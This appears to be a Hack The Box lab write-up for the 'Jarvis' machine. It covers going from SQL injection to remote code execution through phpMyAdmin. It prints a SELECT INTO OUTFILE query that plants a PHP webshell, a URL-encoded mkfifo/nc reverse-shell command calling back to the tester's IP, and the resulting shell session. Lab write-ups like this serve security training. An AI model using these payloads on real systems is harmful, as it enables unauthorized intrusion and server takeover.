InfoSec LAB

Jarvis_Exploitation

Created: 2 min read

SQLi to RCE

logging in to the web gui of phpmyadmin with the credential extracted through SQLi earlier

It would be much more cleaner and organized to execute SQL query from here

The Query tab is where I can run SQL queries I previously have confirmed that I have file the read/write privileges, which I can use to spawn a webshell

I still have to locate the absolute path of the web server

Dryrun

SELECT 'This is a dryrun' INTO OUTFILE '/var/www/html/test.txt'

I will run a test first. I’m just hoping that it’s just the default Apache directory.

┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ curl http://supersecurehotel.htb/test.txt  
This is a dryrun

Success. It was the default directory

Webshell

SELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE '/var/www/html/webshell.php';

Injecting a simple PHP webshell to the webshell.php file at the web root

┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ curl -s 'http://supersecurehotel.htb/webshell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Code execution confirmed

┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ curl -s 'http://supersecurehotel.htb/webshell.php?cmd=mkfifo%20%2Ftmp%2Fhayayq%3B%20nc%2010.10.14.11%209999%200%3C%2Ftmp%2Fhayayq%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fhayayq%202%3E%261%3B%20rm%20%2Ftmp%2Fhayayq'

Sending the payload

┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ nnc 9999       
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.143] 34352
whoami
www-data
hostname
jarvis
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.143  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:be29  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:be29  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:be:29  txqueuelen 1000  (Ethernet)
        RX packets 1497508  bytes 299219883 (285.3 MiB)
        RX errors 0  dropped 41  overruns 0  frame 0
        TX packets 1484822  bytes 614658101 (586.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 4812  bytes 550091 (537.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4812  bytes 550091 (537.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data user via SQLi to RCE

Interactive Graph View

Backlinks